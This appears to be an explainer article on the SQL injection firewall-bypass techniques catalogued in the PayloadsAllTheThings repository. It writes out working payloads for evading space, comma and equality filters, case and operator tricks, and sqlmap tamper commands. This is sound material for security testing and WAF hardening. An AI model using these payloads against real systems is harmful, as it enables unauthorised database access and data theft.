Generic WAF Bypass for SQL Injection: Techniques from PayloadsAllTheThings

Generic WAF bypass techniques for SQL injection replace filtered characters—such as spaces, commas, and equal signs—with alternative whitespace, comments, or logical operators to evade signature-based Web Application Firewalls while maintaining valid database syntax.

The PayloadsAllTheThings repository by swisskyrepo is a community-driven collection of offensive security payloads and exploitation techniques. Its comprehensive SQL Injection documentation, particularly the SQL Injection/README.md file, includes a dedicated Generic WAF Bypass section that catalogs universal methods for circumventing common WAF filters regardless of the underlying database management system.

How Generic WAF Bypasses Work

Modern WAFs often rely on regular expression patterns that detect SQL keywords separated by literal spaces or specific punctuation. By substituting these filtered characters with syntactically equivalent alternatives—such as encoded control characters or comment blocks—attackers can craft payloads that databases parse correctly while WAF regex fails to match.

Generic WAF Bypass Techniques for SQL Injection

The SQL Injection/README.md file organizes bypass methods into four primary filter-evasion families. Each technique targets specific character restrictions while preserving SQL syntax validity across multiple database engines.

Bypassing Space Filters (No Space Allowed)

When WAFs block the space character (0x20), the repository documents several token-separation strategies using alternative whitespace or comment obfuscation.

Alternative Whitespace Characters — Different databases recognize various ASCII control characters as valid whitespace:

?id=1%09and%091=1%09--    (Tab %09)
?id=1%0Aand%0A1=1%0A--    (Line Feed %0A)
?id=1%0Band%0B1=1%0B--    (Vertical Tab %0B)
?id=1%0Cand%0C1=1%0C--    (Form Feed %0C)
?id=1%0Dand%0D1=1%0D--    (Carriage Return %0D)
?id=1%A0and%A01=1%A0--    (Non-Breaking Space %A0)

Comment-Based Obfuscation — SQL comments (/**/) can replace spaces between keywords:

?id=1/*comment*/AND/**/1=1/**/--

Parenthesis-Based Token Separation — Mathematical grouping can separate logical tokens without spaces:

?id=(1)and(1)=(1)--

Bypassing Comma Filters (No Comma Allowed)

When WAFs block the comma character, SQL syntax requiring list separation or LIMIT parameters must be rewritten using alternative constructs.

OFFSET Syntax — Replace LIMIT 0,1 with comma-free alternatives:

?id=1 LIMIT 1 OFFSET 0--

FROM ... FOR Syntax — Substring extraction without commas:

?id=1 AND SUBSTRING(VERSION() FROM 1 FOR 1)='5'

JOIN Constructs — Replace UNION comma separation with JOIN syntax:

UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c

Bypassing Equality Filters (No Equal Allowed)

When the equals sign (=) is filtered, logical comparisons can use alternative operators that maintain boolean logic.

LIKE Operator — Pattern matching substitutes for equality:

?id=1 AND SUBSTRING(VERSION(),1,1)LIKE(5)--

IN Operator — Set membership testing:

?id=1 AND 1 IN (1)--

BETWEEN Operator — Range-based comparison:

?id=1 AND 1 BETWEEN 1 AND 1--

NOT IN Operator — Negative set matching:

?id=1 AND 1 NOT IN (2,3,4)--

Case Modification and Logical Operators

Case Variations — SQL keywords are case-insensitive in most databases:

?id=1 AnD 1=1--
?id=1 aNd 1=1--

Alternative Logical Operators — Replace AND/OR with symbolic equivalents:

?id=1 && 1=1--
?id=1 || 1=2--

Database-Specific Implementations

While generic techniques work across engines, the repository provides optimized variants in database-specific files for maximum compatibility:

  • SQL Injection/MySQL Injection.md — GBK double-byte encoding tricks and MySQL-specific whitespace handling
  • SQL Injection/PostgreSQL Injection.md — PostgreSQL-specific comment syntax and string concatenation methods
  • SQL Injection/DB2 Injection.md — DB2-specific WAF bypass patterns including platform-specific operator variations

Consult these files when generic payloads fail to parse due to database-specific whitespace support or syntax limitations.

Automating WAF Bypass with SQLmap

The SQL Injection/SQLmap.md file documents integration between manual bypass techniques and automated testing. SQLmap's --tamper option can automate the generic WAF bypass methods:


# Replace spaces with comments

sqlmap -u "http://target.com/?id=1" --tamper=space2comment

# Character encoding evasion

sqlmap -u "http://target.com/?id=1" --tamper=charencode

# Tab replacement

sqlmap -u "http://target.com/?id=1" --tamper=space2htab

These tamper scripts implement the encoding and comment-based evasion strategies documented in the repository's generic bypass section, allowing security professionals to test WAF resilience systematically.

Summary

  • Generic WAF bypass techniques target common filter categories: spaces, commas, equality operators, and case sensitivity.
  • Alternative whitespace (tabs, line feeds, non-breaking spaces) and comment obfuscation replace filtered spaces in SQL Injection/README.md.
  • Comma-free syntax uses OFFSET, FROM...FOR, and JOIN constructs to evade list-separation filters.
  • Equality alternatives include LIKE, IN, BETWEEN, and NOT IN operators when = is blocked.
  • Database-specific optimizations are available in MySQL Injection.md, PostgreSQL Injection.md, and DB2 Injection.md.
  • Automation via SQLmap tamper scripts bridges manual techniques with scalable testing.

Frequently Asked Questions

What is a generic WAF bypass for SQL injection?

A generic WAF bypass for SQL injection refers to techniques that evade Web Application Firewalls by replacing filtered characters—such as spaces, commas, or equal signs—with syntactically valid alternatives that work across multiple database management systems. These methods exploit the difference between how WAF regex signatures parse requests and how SQL parsers interpret encoded whitespace or alternative operators.

How do you bypass space filters in SQL injection?

You can bypass space filters by substituting literal spaces with alternative whitespace characters such as tabs (%09), line feeds (%0A), vertical tabs (%0B), or non-breaking spaces (%A0). Additionally, you can use SQL comments like /**/ or mathematical parentheses to separate tokens without using whitespace, as documented in the SQL Injection/README.md file under the "No Space Allowed" section.

Can SQLmap automate WAF bypass techniques?

Yes, SQLmap can automate generic WAF bypass techniques using the --tamper option, which applies transformation scripts to payloads before sending them. For example, --tamper=space2comment replaces spaces with comments, while --tamper=charencode applies character encoding evasion, directly implementing the manual techniques described in the repository's SQL Injection/SQLmap.md documentation.

Are generic WAF bypasses effective against all databases?

Generic WAF bypasses are designed to work across multiple database engines, but effectiveness varies based on specific DBMS whitespace support and syntax variations. While techniques like comment-based space replacement work universally, alternative whitespace characters such as vertical tabs or non-breaking spaces may only parse correctly in specific databases like MySQL or PostgreSQL, requiring consultation of the database-specific files like MySQL Injection.md or PostgreSQL Injection.md for optimal payload selection.

Have a question about this repo?

These articles cover the highlights, but your codebase questions are specific. Give your agent direct access to the source. Share this with your agent to get started:

Share the following with your agent to get started:
curl -s "https://instagit.com/install.md"

Works with
Claude Codex Cursor VS Code OpenClaw Any MCP Client

Maintain an open-source project? Get it listed too →